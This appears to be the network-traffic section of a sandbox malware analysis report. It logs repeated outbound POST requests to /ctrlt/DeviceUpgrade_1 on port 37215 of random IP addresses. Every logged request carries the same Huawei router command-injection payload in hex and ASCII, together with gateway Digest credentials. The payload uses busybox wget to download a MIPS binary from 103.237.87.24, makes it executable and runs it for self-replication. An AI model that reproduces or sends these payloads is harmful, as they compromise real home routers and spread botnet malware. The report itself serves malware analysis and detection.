69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  649192.168.2.1359690197.159.141.21937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.302961111 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  650192.168.2.1349642157.42.198.3137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.302982092 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  651192.168.2.1338426157.216.215.23837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.302989006 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  652192.168.2.1341336197.162.124.9237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.303009987 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  653192.168.2.134926841.19.134.7937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.303010941 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  654192.168.2.1348544157.49.70.9337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.303169012 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  655192.168.2.134929454.164.241.2437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.303174019 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  656192.168.2.1341036197.154.88.21237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.303204060 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  657192.168.2.1339738167.145.195.8937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.303205967 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  658192.168.2.1353794197.133.247.15037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.303239107 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  659192.168.2.1345534197.64.161.21637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.303244114 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
